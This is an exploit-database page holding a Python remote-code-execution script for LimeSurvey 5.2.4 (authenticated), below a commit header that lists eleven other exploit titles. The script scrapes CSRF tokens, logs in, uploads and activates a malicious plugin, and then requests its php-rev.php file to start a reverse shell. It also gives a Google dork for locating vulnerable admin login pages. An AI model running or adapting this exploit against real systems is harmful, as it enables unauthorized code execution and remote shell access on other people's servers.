c906261f2c
11 changes to exploits/shellcodes MTPutty 1.0.1.21 - SSH Password Disclosure Raspberry Pi 5.10 - Default Credentials Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated) Chikitsa Patient Management System 2.0.2 - 'backup' Remote Code Execution (RCE) (Authenticated) LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated) TestLink 1.19 - Arbitrary File Download (Unauthenticated) Student Management System 1.0 - SQLi Authentication Bypass Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated) Grafana 8.3.0 - Directory Traversal and Arbitrary File Read Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass Employees Daily Task Management System 1.0 - 'multiple' Cross Site Scripting (XSS)
111 lines
No EOL
4.5 KiB
Python
Executable file
111 lines
No EOL
4.5 KiB
Python
Executable file
# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
|
|
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
|
|
# Date: 05/12/2021
|
|
# Exploit Author: Y1LD1R1M
|
|
# Vendor Homepage: https://www.limesurvey.org/
|
|
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
|
|
# Version: 5.2.x
|
|
# Tested on: Kali Linux 2021.3
|
|
# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
|
|
|
|
#!/usr/bin/python
|
|
# -*- coding: utf-8 -*-
|
|
|
|
|
|
import requests
|
|
import sys
|
|
import warnings
|
|
from bs4 import BeautifulSoup
|
|
|
|
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
|
print("_______________LimeSurvey RCE_______________")
|
|
print("")
|
|
print("")
|
|
print("Usage: python exploit.py URL username password port")
|
|
print("Example: python exploit.py http://192.26.26.128 admin password 80")
|
|
print("")
|
|
print("")
|
|
print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")
|
|
print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")
|
|
print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")
|
|
print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")
|
|
print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")
|
|
print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")
|
|
print("")
|
|
print("")
|
|
url = sys.argv[1]
|
|
username = sys.argv[2]
|
|
password = sys.argv[3]
|
|
port = sys.argv[4]
|
|
|
|
req = requests.session()
|
|
print("[+] Retrieving CSRF token...")
|
|
loginPage = req.get(url+"/index.php/admin/authentication/sa/login")
|
|
response = loginPage.text
|
|
s = BeautifulSoup(response, 'html.parser')
|
|
CSRF_token = s.findAll('input')[0].get("value")
|
|
print(CSRF_token)
|
|
print("[+] Sending Login Request...")
|
|
|
|
login_creds = {
|
|
"user": username,
|
|
"password": password,
|
|
"authMethod": "Authdb",
|
|
"loginlang":"default",
|
|
"action":"login",
|
|
"width":"1581",
|
|
"login_submit": "login",
|
|
"YII_CSRF_TOKEN": CSRF_token
|
|
}
|
|
print("[+]Login Successful")
|
|
print("")
|
|
print("[+] Upload Plugin Request...")
|
|
print("[+] Retrieving CSRF token...")
|
|
filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS
|
|
login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)
|
|
UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")
|
|
response = UploadPage.text
|
|
s = BeautifulSoup(response, 'html.parser')
|
|
CSRF_token2 = s.findAll('input')[0].get("value")
|
|
print(CSRF_token2)
|
|
Upload_creds = {
|
|
"YII_CSRF_TOKEN":CSRF_token2,
|
|
"lid":"$lid",
|
|
"action": "templateupload"
|
|
}
|
|
file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)
|
|
UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")
|
|
response = UploadPage.text
|
|
print("[+] Plugin Uploaded Successfully")
|
|
print("")
|
|
print("[+] Install Plugin Request...")
|
|
print("[+] Retrieving CSRF token...")
|
|
|
|
InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")
|
|
response = InstallPage.text
|
|
s = BeautifulSoup(response, 'html.parser')
|
|
CSRF_token3 = s.findAll('input')[0].get("value")
|
|
print(CSRF_token3)
|
|
Install_creds = {
|
|
"YII_CSRF_TOKEN":CSRF_token3,
|
|
"isUpdate": "false"
|
|
}
|
|
file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)
|
|
print("[+] Plugin Installed Successfully")
|
|
print("")
|
|
print("[+] Activate Plugin Request...")
|
|
print("[+] Retrieving CSRF token...")
|
|
ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")
|
|
response = ActivatePage.text
|
|
s = BeautifulSoup(response, 'html.parser')
|
|
CSRF_token4 = s.findAll('input')[0].get("value")
|
|
print(CSRF_token4)
|
|
Activate_creds = {
|
|
"YII_CSRF_TOKEN":CSRF_token4,
|
|
"pluginId": "1" # CHANGE THIS
|
|
}
|
|
file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)
|
|
print("[+] Plugin Activated Successfully")
|
|
print("")
|
|
print("[+] Reverse Shell Starting, Check Your Connection :)")
|
|
shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS |